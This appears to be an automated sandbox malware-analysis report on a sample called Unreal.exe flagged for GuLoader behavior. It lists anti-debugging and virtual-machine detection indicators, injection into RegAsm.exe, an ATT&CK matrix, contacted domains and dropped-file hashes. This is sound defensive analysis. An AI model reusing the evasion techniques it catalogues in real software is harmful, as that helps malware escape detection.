        Source: WerFault.exe, 0000000C.00000002.5640399370.0000000002748000.00000004.00000020.sdmpBinary or memory string: Hyper-V RAW<
        Source: RegAsm.exe, 00000008.00000002.5647356413.0000000001108000.00000004.00000020.sdmp, WerFault.exe, 0000000C.00000003.5635072235.000000000277E000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW
        Source: mpasdlta.vdm.23.drBinary or memory string: KqEMUm
        Source: Unreal.exe, 00000000.00000002.3501696726.0000000002260000.00000004.00000001.sdmp, RegAsm.exe, 00000008.00000000.5526462839.0000000000FE0000.00000004.00000001.sdmpBinary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe
        Source: Unreal.exe, 00000000.00000002.3501696726.0000000002260000.00000004.00000001.sdmpBinary or memory string: ntdllkernel32user32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exepsapi.dllMsi.dllPublishershell32advapi32USERPROFILE=windir=\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe\syswow64\msvbvm60.dllwindir=\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe\syswow64\msvbvm60.dll
        Source: Unreal.exe, 00000000.00000002.3501073850.00000000005B4000.00000004.00000020.sdmpBinary or memory string: \??\C:\Program Files\Qemu-ga\qemu-ga.exe8

        Anti Debugging:

        barindex
        Hides threads from debuggersShow sources
        Source: C:\Users\user\Desktop\Unreal.exeThread information set: HideFromDebugger
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeThread information set: HideFromDebugger
        Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\029C0225-A9FE-4247-9FEB-6A4C69D031CD\MpSigStub.exeCode function: 24_2_00007FF742E33BFC RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
        Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\029C0225-A9FE-4247-9FEB-6A4C69D031CD\MpSigStub.exeCode function: 24_2_00007FF742E30C0C GetProcessHeap,HeapAlloc,InitializeCriticalSectionAndSpinCount,
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 8_2_00D599BA rdtsc
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 8_2_00D5E567 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 8_2_00D5D56C mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 8_2_00D59749 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Unreal.exeProcess queried: DebugPort
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess queried: DebugPort
        Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\029C0225-A9FE-4247-9FEB-6A4C69D031CD\MpSigStub.exeCode function: 24_2_00007FF742E4B798 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
        Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\029C0225-A9FE-4247-9FEB-6A4C69D031CD\MpSigStub.exeCode function: 24_2_00007FF742E33BFC RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
        Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\029C0225-A9FE-4247-9FEB-6A4C69D031CD\MpSigStub.exeCode function: 24_2_00007FF742E4BF4C SetUnhandledExceptionFilter,
        Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\029C0225-A9FE-4247-9FEB-6A4C69D031CD\MpSigStub.exeCode function: 24_2_00007FF742E4BD68 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

        HIPS / PFW / Operating System Protection Evasion:

        barindex
        Writes to foreign memory regionsShow sources
        Source: C:\Users\user\Desktop\Unreal.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe base: D50000
        Source: unknownProcess created: C:\Windows\System32\wevtutil.exe C:\Windows\system32\wevtutil.exe install-manifest C:\Windows\TEMP\A491FE0B-CBB3-0812-A9E9-28E6069853FA.man '/resourceFilePath:C:\ProgramData\Microsoft\Windows Defender\Definition Updates\StableEngineEtwLocation\mpengine_etw.dll' '/messageFilePath:C:\ProgramData\Microsoft\Windows Defender\Definition Updates\StableEngineEtwLocation\mpengine_etw.dll' '/parameterFilePath:C:\ProgramData\Microsoft\Windows Defender\Definition Updates\StableEngineEtwLocation\mpengine_etw.dll'
        Source: C:\Users\user\Desktop\Unreal.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe 'C:\Users\user\Desktop\Unreal.exe'
        Source: C:\Users\user\Desktop\Unreal.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe 'C:\Users\user\Desktop\Unreal.exe'
        Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\029C0225-A9FE-4247-9FEB-6A4C69D031CD\MpSigStub.exeCode function: 24_2_00007FF742E2F884 GetCurrentProcess,GetLengthSid,InitializeSecurityDescriptor,InitializeAcl,AddAccessAllowedAce,AddAccessAllowedAce,AddAccessAllowedAce,AddAccessAllowedAce,SetSecurityDescriptorDacl,GetLastError,CloseHandle,SetLastError,
        Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\029C0225-A9FE-4247-9FEB-6A4C69D031CD\MpSigStub.exeCode function: 24_2_00007FF742E2E0C4 AllocateAndInitializeSid,FreeSid,
        Source: RegAsm.exe, 00000008.00000000.5538042827.0000000001700000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd
        Source: RegAsm.exe, 00000008.00000000.5538042827.0000000001700000.00000002.00020000.sdmpBinary or memory string: Progman
        Source: RegAsm.exe, 00000008.00000000.5538042827.0000000001700000.00000002.00020000.sdmpBinary or memory string: Progmanlock
        Source: RegAsm.exe, 00000008.00000000.5538042827.0000000001700000.00000002.00020000.sdmpBinary or memory string: /Program Manager
        Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\029C0225-A9FE-4247-9FEB-6A4C69D031CD\MpSigStub.exeCode function: 24_2_00007FF742E2418C cpuid
        Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\029C0225-A9FE-4247-9FEB-6A4C69D031CD\MpSigStub.exeCode function: 24_2_00007FF742DDF3E8 GetCurrentProcessId,GetCurrentProcessId,CreateNamedPipeW,GetCurrentProcessId,
        Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-20b5c938.exeCode function: 23_2_00007FF7EC298ED4 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,
        Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\029C0225-A9FE-4247-9FEB-6A4C69D031CD\MpSigStub.exeCode function: 24_2_00007FF742E2D78C RtlGetVersion,RtlNtStatusToDosError,SetLastError,GetLastError,

        Stealing of Sensitive Information:

        barindex
        GuLoader behavior detectedShow sources
        Source: Initial fileSignature Results: GuLoader behavior

        Mitre Att&ck Matrix

        Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
        Valid AccountsCommand and Scripting Interpreter1Windows Service1Access Token Manipulation1Masquerading3Input Capture1System Time Discovery1Remote ServicesInput Capture1Exfiltration Over Other Network MediumEncrypted Channel21Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
        Default AccountsService Execution2DLL Side-Loading1Windows Service1Virtualization/Sandbox Evasion22LSASS MemoryQuery Registry1Remote Desktop ProtocolArchive Collected Data1Exfiltration Over BluetoothIngress Tool Transfer3Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
        Domain AccountsAt (Linux)Logon Script (Windows)Process Injection113Access Token Manipulation1Security Account ManagerSecurity Software Discovery341SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol3Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
        Local AccountsAt (Windows)Logon Script (Mac)DLL Side-Loading1Process Injection113NTDSVirtualization/Sandbox Evasion22Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol114SIM Card SwapCarrier Billing Fraud
        Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptDeobfuscate/Decode Files or Information1LSA SecretsProcess Discovery3SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
        Replication Through Removable MediaLaunchdRc.commonRc.commonObfuscated Files or Information2Cached Domain CredentialsFile and Directory Discovery1VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
        External Remote ServicesScheduled TaskStartup ItemsStartup ItemsDLL Side-Loading1DCSyncSystem Information Discovery14Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
        Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobFile Deletion1Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue

        Behavior Graph

        Hide Legend

        Legend:

        • Process
        • Signature
        • Created File
        • DNS/IP Info
        • Is Dropped
        • Is Windows Process
        • Number of created Registry Values
        • Number of created Files
        • Visual Basic
        • Delphi
        • Java
        • .Net C# or VB.NET
        • C, C++ or other language
        • Is malicious
        • Internet
        behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1369 Sample: Unreal.exe Startdate: 27/09/2021 Architecture: WINDOWS Score: 92 40 spclient.wg.spotify.com 2->40 42 prda.aadg.msidentity.com 2->42 44 2 other IPs or domains 2->44 48 Found malware configuration 2->48 50 Multi AV Scanner detection for submitted file 2->50 52 GuLoader behavior detected 2->52 54 3 other signatures 2->54 8 Unreal.exe 1 2->8         started        11 mpam-20b5c938.exe 4 2->11         started        14 wevtutil.exe 8 1 2->14         started        16 wevtutil.exe 1 2->16         started        signatures3 process4 file5 60 Writes to foreign memory regions 8->60 62 Tries to detect Any.run 8->62 64 Hides threads from debuggers 8->64 18 RegAsm.exe 13 8->18         started        22 RegAsm.exe 8->22         started        34 C:\Windows\ServiceProfiles\...\mpavdlta.vdm, PE32+ 11->34 dropped 36 C:\Windows\ServiceProfiles\...\mpasdlta.vdm, PE32+ 11->36 dropped 38 C:\Windows\ServiceProfiles\...\MpSigStub.exe, PE32+ 11->38 dropped 24 MpSigStub.exe 1 11->24         started        26 conhost.exe 14->26         started        28 conhost.exe 16->28         started        signatures6 process7 dnsIp8 46 drive.google.com 142.250.185.142, 443, 49763 GOOGLEUS United States 18->46 56 Tries to detect Any.run 18->56 58 Hides threads from debuggers 18->58 30 WerFault.exe 22 16 18->30         started        32 conhost.exe 18->32         started        signatures9 process10

        Screenshots

        Thumbnails

        This section contains all screenshots as thumbnails, including those not shown in the slideshow.

        windows-stand

        Antivirus, Machine Learning and Genetic Malware Detection

        Initial Sample

        SourceDetectionScannerLabelLink
        Unreal.exe13%ReversingLabsWin32.Trojan.Ursu

        Dropped Files

        SourceDetectionScannerLabelLink
        C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\029C0225-A9FE-4247-9FEB-6A4C69D031CD\MpSigStub.exe0%VirustotalBrowse
        C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\029C0225-A9FE-4247-9FEB-6A4C69D031CD\MpSigStub.exe0%ReversingLabs
        C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\029C0225-A9FE-4247-9FEB-6A4C69D031CD\mpasdlta.vdm0%VirustotalBrowse
        C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\029C0225-A9FE-4247-9FEB-6A4C69D031CD\mpavdlta.vdm0%VirustotalBrowse

        Unpacked PE Files

        No Antivirus matches

        Domains

        No Antivirus matches

        URLs

        No Antivirus matches

        Domains and IPs

        Contacted Domains

        NameIPActiveMaliciousAntivirus DetectionReputation
        drive.google.com
        		142.250.185.142
        		truefalse
          		high
          edge-web.dual-gslb.spotify.com
          		35.186.224.25
          		truefalse
            		high
            spclient.wg.spotify.com
            		unknown
            		unknownfalse
              		high

              URLs from Memory and Binaries

              NameSourceMaliciousAntivirus DetectionReputation
              https://drive.google.com/IRegAsm.exe, 00000008.00000002.5647356413.0000000001108000.00000004.00000020.sdmpfalse
                		high
                https://drive.google.com/ARegAsm.exe, 00000008.00000002.5647356413.0000000001108000.00000004.00000020.sdmpfalse
                  		high

                  Contacted IPs

                  • No. of IPs < 25%
                  • 25% < No. of IPs < 50%
                  • 50% < No. of IPs < 75%
                  • 75% < No. of IPs

                  Public

                  IPDomainCountryFlagASNASN NameMalicious
                  142.250.185.142
                  		drive.google.comUnited States
                  		15169GOOGLEUSfalse

                  General Information

                  Joe Sandbox Version:33.0.0 White Diamond
                  Analysis ID:1369
                  Start date:27.09.2021
                  Start time:16:30:00
                  Joe Sandbox Product:CloudBasic
                  Overall analysis duration:0h 13m 44s
                  Hypervisor based Inspection enabled:false
                  Report type:light
                  Sample file name:Unreal.exe
                  Cookbook file name:default.jbs
                  Analysis system description:Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2019, IE 11, Chrome 93, Firefox 91, Adobe Reader DC 21, Java 8 Update 301
                  Run name:Suspected Instruction Hammering
                  Number of analysed new started processes analysed:30
                  Number of new started drivers analysed:0
                  Number of existing processes analysed:0
                  Number of existing drivers analysed:0
                  Number of injected processes analysed:0
                  Technologies:
                  • HCA enabled
                  • EGA enabled
                  • HDC enabled
                  • AMSI enabled
                  Analysis Mode:default
                  Analysis stop reason:Timeout
                  Detection:MAL
                  Classification:mal92.troj.evad.winEXE@14/8@2/1
                  EGA Information:Failed
                  HDC Information:Failed
                  HCA Information:Failed
                  Cookbook Comments:
                  • Adjust boot time
                  • Enable AMSI
                  • Found application associated with file extension: .exe
                  Warnings:
                  Show All
                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe
                  • Excluded IPs from analysis (whitelisted): 20.54.122.82, 40.125.122.176, 8.248.115.254, 8.248.143.254, 8.253.95.120, 67.26.81.254, 67.26.137.254, 52.242.97.97, 20.54.89.15, 20.199.120.85, 20.199.120.151, 20.190.160.129, 20.190.160.2, 20.190.160.136, 20.190.160.4, 20.190.160.6, 20.190.160.75, 20.190.160.134, 20.190.160.67, 20.42.65.92, 104.89.38.104, 2.21.143.74, 2.21.140.235, 20.199.120.182
                  • Excluded domains from analysis (whitelisted): definitionupdates.microsoft.com.edgekey.net, fg.download.windowsupdate.com.c.footprint.net, slscr.update.microsoft.com, www.tm.lg.prod.aadmsa.akadns.net, e13678.dscb.akamaiedge.net, www.tm.a.prd.aadg.trafficmanager.net, www.microsoft.com-c-3.edgekey.net.globalredir.akadns.net, fe3.delivery.dsp.mp.microsoft.com.nsatc.net, e11290.dspg.akamaiedge.net, wns.notify.trafficmanager.net, www.microsoft.com-c-3.edgekey.net, go.microsoft.com, login.live.com, slscr.update.microsoft.com.akadns.net, definitionupdates.microsoft.com, client.wns.windows.com, e3673.g.akamaiedge.net, sls.update.microsoft.com.akadns.net, wu-shim.trafficmanager.net, ctldl.windowsupdate.com, wdcp.microsoft.com, wd-prod-cp.trafficmanager.net, login.msa.msidentity.com, fe3cr.delivery.mp.microsoft.com, wd-prod-cp-eu-north-1-fe.northeurope.cloudapp.azure.com, sls.emea.update.microsoft.com.akadns.net, wdcpalt.microsoft.com, fe3.delivery.mp.microsoft.com, onedsblobprdeus17.eastus.cloudapp.azure.com, blobcollector.events.data.trafficmanager.net, go.microsoft.com.edgekey.net, umwatson.events.data.microsoft.com, www.microsoft.com
                  • Not all processes where analyzed, report is missing behavior information
                  • Report size getting too big, too many NtEnumerateKey calls found.
                  • Report size getting too big, too many NtOpenKeyEx calls found.
                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                  • Report size getting too big, too many NtQueryValueKey calls found.

                  Simulations

                  Behavior and APIs

                  TimeTypeDescription
                  16:33:03API Interceptor1x Sleep call for process: RegAsm.exe modified
                  16:37:10API Interceptor1x Sleep call for process: WerFault.exe modified

                  Joe Sandbox View / Context

                  IPs

                  No context

                  Domains

                  MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                  edge-web.dual-gslb.spotify.comhVlpEajflR.exeGet hashmaliciousBrowse
                  • 35.186.224.25

                  ASN

                  No context

                  JA3 Fingerprints

                  MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                  37f463bf4616ecd445d4a1937da06e19Silver_Light_Group_DOC03027321122.exeGet hashmaliciousBrowse
                  • 142.250.185.142
                  7XmWGse79x.exeGet hashmaliciousBrowse
                  • 142.250.185.142
                  m5W1BZQU4m.exeGet hashmaliciousBrowse
                  • 142.250.185.142
                  hHsIHUGICB.exeGet hashmaliciousBrowse
                  • 142.250.185.142
                  NOgYb2fHbO.exeGet hashmaliciousBrowse
                  • 142.250.185.142
                  VwDvbAowp0.exeGet hashmaliciousBrowse
                  • 142.250.185.142
                  lXy3MnXJ83.exeGet hashmaliciousBrowse
                  • 142.250.185.142
                  BXTOD28N3I.exeGet hashmaliciousBrowse
                  • 142.250.185.142
                  Kapitu.exeGet hashmaliciousBrowse
                  • 142.250.185.142
                  SebwAujas5.exeGet hashmaliciousBrowse
                  • 142.250.185.142
                  nxW9yUgdYM.exeGet hashmaliciousBrowse
                  • 142.250.185.142
                  Payment_Advice.exeGet hashmaliciousBrowse
                  • 142.250.185.142
                  cxBR3cCGTw.exeGet hashmaliciousBrowse
                  • 142.250.185.142
                  k5THcVgINl.exeGet hashmaliciousBrowse
                  • 142.250.185.142
                  b2i2IopgOC.exeGet hashmaliciousBrowse
                  • 142.250.185.142
                  G2BPn4a7o1.exeGet hashmaliciousBrowse
                  • 142.250.185.142
                  Dokument VAT I - 85926 09 2021 MAG-8.exeGet hashmaliciousBrowse
                  • 142.250.185.142
                  qOsCIQD1uR.exeGet hashmaliciousBrowse
                  • 142.250.185.142
                  NC7bm1PoKj.exeGet hashmaliciousBrowse
                  • 142.250.185.142
                  p0FDRanFUE.exeGet hashmaliciousBrowse
                  • 142.250.185.142

                  Dropped Files

                  No context

                  Created / dropped Files

                  C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_RegAsm.exe_bf83f564e97574c9bbf23ac35112572b5de6d5_e9e275a3_bac2586d-6b28-40ad-af6b-2dc7bcda6e5d\Report.wer
                  Process:C:\Windows\SysWOW64\WerFault.exe
                  File Type:Little-endian UTF-16 Unicode text, with CRLF line terminators
                  Category:dropped
                  Size (bytes):14172
                  Entropy (8bit):3.7655413027301523
                  Encrypted:false
                  SSDEEP:192:bmNk2b1Q4TmSaAa403TaU5QPmRtDu76PfAIO8ErPf:yNkAQFSaA4aU++tDu76PfAIO8wPf
                  MD5:EB077F8A99E22283743F463500155C8B
                  SHA1:72A799BACC0F6537298B6EE2B8E78706F85FB711
                  SHA-256:F3D1AF47BA08A576BA22D99FB21B2C0C8ECA0909C1182D7330DF4A741F7A62FA
                  SHA-512:BDA7B9AD678F33CD47E102E0FF23F2DBCB4896D50C85BFAF6F5536B7A2D535989EBD17755C626FDD8F4242DD30D68F626A86F82BD3891A2F9DB184ACC73A280D
                  Malicious:false
                  Reputation:low
                  Preview: ..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.2.7.7.2.3.0.6.2.6.7.2.9.5.4.4.7.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.2.7.7.2.3.0.6.2.9.0.8.8.3.5.1.3.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.b.a.c.2.5.8.6.d.-.6.b.2.8.-.4.0.a.d.-.a.f.6.b.-.2.d.c.7.b.c.d.a.6.e.5.d.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.c.e.0.e.f.6.6.e.-.2.1.a.9.-.4.6.a.7.-.9.8.d.3.-.8.9.7.f.6.9.3.e.c.5.4.e.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.R.e.g.A.s.m...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.R.e.g.A.s.m...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.d.5.4.-.0.0.0.1.-.0.0.1.0.-.5.5.5.a.-.f.5.e.2.b.4.b.3.d.7.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.e.e.e.8.b.2.5.7.3.f.7.1.e.8.d.5.c.3.e.e.7.e.5.3.a.f.3.e.6.7.7.2.e.0.9.0.d.0.f.3.!.
                  C:\ProgramData\Microsoft\Windows\WER\Temp\WEREA47.tmp.dmp
                  Process:C:\Windows\SysWOW64\WerFault.exe
                  File Type:Mini DuMP crash report, 14 streams, Mon Sep 27 15:37:07 2021, 0x1205a4 type
                  Category:dropped
                  Size (bytes):76462
                  Entropy (8bit):2.1964997599695373
                  Encrypted:false
                  SSDEEP:384:TCRsn5gyGXQHCT4PE6ipvxx518uKlDp5kK:TTn5gyg7TsETxHBIDp5kK
                  MD5:70F9CA1B43425219D7E8BE4CE40F89B5
                  SHA1:762B772DB4621C73A0BF077706A35333F955611F
                  SHA-256:4B1D46C06B7270351D218F0E559F31D36DF5424EDD0DD84071BB250FA8FD9B1B
                  SHA-512:46C963CEC4BBD273D9329A9B7A40A916F54B4BC998962A31D127C689ACB774116425671B6B59F6FEAB7023B52BF3A237D84F1C5D8F66E26C2CA92B5840DA2F43
                  Malicious:false
                  Preview: MDMP..a..... .......#.Qa..............................bJ.......(......GenuineIntel...........T.......T.....Qa.............................0..................G.M.T. .S.t.a.n.d.a.r.d. .T.i.m.e...................................................G.M.T. .D.a.y.l.i.g.h.t. .T.i.m.e...................................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...........................................................................................................................................................................................................................................................................................................................................................................................................................................................d.b.g.c.o.r.e...i.3.8.6.,.1.0...0...1.9.0.4.1...5.4.6.....................................................................................................
                  C:\ProgramData\Microsoft\Windows\WER\Temp\WEREFC6.tmp.WERInternalMetadata.xml
                  Process:C:\Windows\SysWOW64\WerFault.exe
                  File Type:XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
                  Category:dropped
                  Size (bytes):6362
                  Entropy (8bit):3.72809936357387
                  Encrypted:false
                  SSDEEP:192:R9l7lZNi0I6TbtYzFN4acpDR89bf/sbsfM1m:R9lnNi76TbtYp5fLfT
                  MD5:7397ACE7BCE045EB5049FB6C752EE5C7
                  SHA1:D428A0E75DDE5AD16804515C35008CB01BF580CF
                  SHA-256:83AC34525B6AA26568FE0DC7F6A964831247844677A84EE585AD18567362BCAB
                  SHA-512:44C5D442D586EF438112177D22257D20BA3B8F0BE3DE937CF74E550A3393155C6685806BB4B37862F12A15E1178CCECC97B49D28F51CE628C33300B222237E21
                  Malicious:false
                  Preview: ..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.2.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...1.1.6.5...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.1.6.5.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.5.0.8.<./.P.i.
                  C:\ProgramData\Microsoft\Windows\WER\Temp\WERF092.tmp.xml
                  Process:C:\Windows\SysWOW64\WerFault.exe
                  File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                  Category:dropped
                  Size (bytes):4830
                  Entropy (8bit):4.5178125588485045
                  Encrypted:false
                  SSDEEP:48:cvIwwtl8zs/Me702I7VFJ5WS2CfjkMs3rm8M4JfuDm4OqFl/u+q8oBX/OFH/ELu1:uILf/x7GySPf+Jfuvp2vtSHau84uWrd
                  MD5:D065B32D803F90219D2FA5BAB571DDD2
                  SHA1:DC90C8EA75C341C4DBF75A3E100F4227D2A2CA44
                  SHA-256:4B5CA7DFF2D32147039A8EAF1615B961EED5779F3EE1BCDCD8EE169D11FD7496
                  SHA-512:943D2F5268F30F0AA912A8B0EE4C0D7F3CB503BF9818886DEC81249480A6F56BD8B4BC216E418585DB28DB07E9FD4D5BD319CDFE2F5F3F87C0F3900BEC7C9520
                  Malicious:false
                  Preview: <?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19042" />.. <arg nm="vercsdbld" val="1165" />.. <arg nm="verqfe" val="1165" />.. <arg nm="csdbld" val="1165" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="242" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="221284459" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="
                  C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\029C0225-A9FE-4247-9FEB-6A4C69D031CD\MpSigStub.exe
                  Process:C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-20b5c938.exe
                  File Type:PE32+ executable (GUI) x86-64, for MS Windows
                  Category:dropped
                  Size (bytes):803176
                  Entropy (8bit):6.37118649960636
                  Encrypted:false
                  SSDEEP:24576:Ghj1QlBYDgtUUvie3n+pB3+ojRlcD1VyZTFXk:GhpQlBHtBYla1VyZpU
                  MD5:01F92DC7A766FF783AE7AF40FD0334FB
                  SHA1:45D7B8E98E22F939ED0083FE31204CAA9A72FA76
                  SHA-256:FA42B9B84754E2E8368E8929FA045BE86DBD72678176EE75814D2A16D23E5C26
                  SHA-512:BEA5F3D7FB0984C4A71720F25644CE3151FCDC95586E1E2FFE804D04567AAF30D8678608110E241C7DDF908F94882EDDD84A994573B0C808D1C064F0E135A583
                  Malicious:false
                  Antivirus:
                  • Antivirus: Virustotal, Detection: 0%, Browse
                  • Antivirus: ReversingLabs, Detection: 0%
                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........B..#...#...#..EV...#...Q...#...Q...#...Q...#...Q...#...#..."..EV..#..EVN..#..EV...#..Rich.#..........PE..d.....P.........."......`....................@.............................0.......-....`.......... .......................................t..d....... ........D... ..h!... ......d...p.......................(......8...........0................................text...2R.......`.................. ..`.rdata.......p... ...p..............@..@.data..../....... ..................@....pdata...D.......P..................@..@.rsrc... ...........................@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................
                  C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\029C0225-A9FE-4247-9FEB-6A4C69D031CD\mpasdlta.vdm
                  Process:C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-20b5c938.exe
                  File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                  Category:dropped
                  Size (bytes):7754168
